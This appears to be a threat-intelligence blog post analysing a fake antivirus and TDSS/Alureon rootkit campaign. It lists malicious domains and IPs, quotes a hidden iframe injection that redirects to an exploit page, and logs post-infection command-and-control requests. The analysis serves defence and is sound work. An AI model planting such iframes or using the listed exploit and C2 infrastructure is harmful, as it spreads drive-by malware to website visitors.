Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan READ THIS page if you need more information A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon. All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below) Check it out - maybe someone have access to your PC right now! Protect yourself. Also Google show 14,800 result for this phrase. Detection: Trojan TDSS Trojan DNSChanger Trojan Kryptik Trojan FakeSpyGuard Trojan InternetAntivirusPro Sites serving for the fake antivirus campaign: 209.44.126.14 activesecurityshield.com anytoplikedsite.com basevirusscan.com bestfiresfull.com bestsecurityupdate.com checkonlinesecurity.com cleanyourpcspace.com destroyvirusnow.com fastsecurityscan.com fastviruscleaner.com firstscansecurity.com fuc*moneycash.com fullandtotalsecurity.com fullsecurityshield.com getpcguard.com getscanonline.com getsecuritywall.com greatsecurityshield.com inetsecuritycenter.com initialsecurityscan.com mostpopularscan.com myfirstsecurityscan.com mytoplikedsite.com mytopvirusscan.com onlinescandetect.com onlinescanservice.com popularpcscan.com runpcscannow.com scanalertspage.com scanbaseonline.com scanprotectiononline.com scanvistanow.net securityscan4you.com securitytopagent.com thegreatsecurity.com todaybestscan.com topsecurity4you.com topsecurityapp.com topsoftscanner.com totalpcdefender.com totalvirusdestroyer.com truescansecurity.com trustsecurityshield.com upyoursecurity.com virustopshield.com vistastabilitynow.com vistastabilitynow.net websecuritymaster.com websecurityvoice.com yourstabilitysystem.com 209.44.126.16 systemsecurityonline.com systemsecuritytool.com 209.44.126.29 individualpeople.biz (will be analyzed below) 209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23 NS for rogue fake av websites 209.44.126.32 asmmnation.com ThreatExpert report In conjunction with an IP in ukraine : Symantec write up On this IP 209.44.126.29 we also have a couple of page with exploits which leads to the trojan TDSS (Alureon). I will take this domain for example "individualpeople[.]biz" Malicious script (IFRAME) inserted. Redirection Analysis <iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> Redirects to the page below which host several exploits. Javascript Analysis (Wepawet) hxxp://individualpeople.biz/go.php?sid=6 Anubis Report hxxp://209.44.126.30/unsecurity/pdf.php Wepawet Analysis - VirusTotal to finally load this page hxxp://209.44.126.30/unsecurity/load.php VirusTotal - Anubis Detections: W32/Alureon.B!Generic Win32.Rootkit.TDSS.eyj.4 Packed.Win32.Tdss.f Trojan.Win32.FakeSpyguard Trojan:Win32/Alureon.gen!J Trojan/Fakealert.gen -------------------------------------- HTTP activity after infection 92.48.91.145:80 - [trafficstatic.net] Request: GET /banner/crcmds/main Response: 200 "OK" Request: GET /banner/crcmds/init Response: 200 "OK" Request: GET /banner/uacsrcr.dat Response: 200 "OK" Request: GET /banner/crcmds/update Response: 200 "OK" Request: GET /banner/crfiles/uacd Response: 200 "OK" Request: GET /banner/crfiles/uacc Response: 200 "OK" Request: GET /banner/crfiles/uaclog Response: 200 "OK" Request: GET /banner/crfiles/uacmask Response: 200 "OK" Request: GET /banner/crfiles/uacserf Response: 200 "OK" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/types/standart Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found" Request: GET /banner/crcmds/builds/bbr Response: 200 "OK" Request: GET /banner/crfiles/uacbbr Response: 200 "OK" 72.233.114.126:80 - [statsanalist.cn] Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 Response: 200 "OK" Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 Response: 200 "OK" IPs implicated: 209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23 209.44.126.29 209.44.126.32 Other domain in conjunction can be found using ThreatExpert /banner/crcmds/main Report 1 Report 2 92.48.91.144 trafficstatic.com explorerex.com windowslogonex.com 92.48.91.145 trafficstatic.net ThreatExpert Report 95.211.14.159 golddiggero1.com 76.76.103.162 webieupdate.net 94.76.208.32 symupdate2.com ThreatExpert Report 72.233.114.125 webnicrisoft.net ThreatExpert Report 64.213.140.254 webmsupdate.net ThreatExpert Report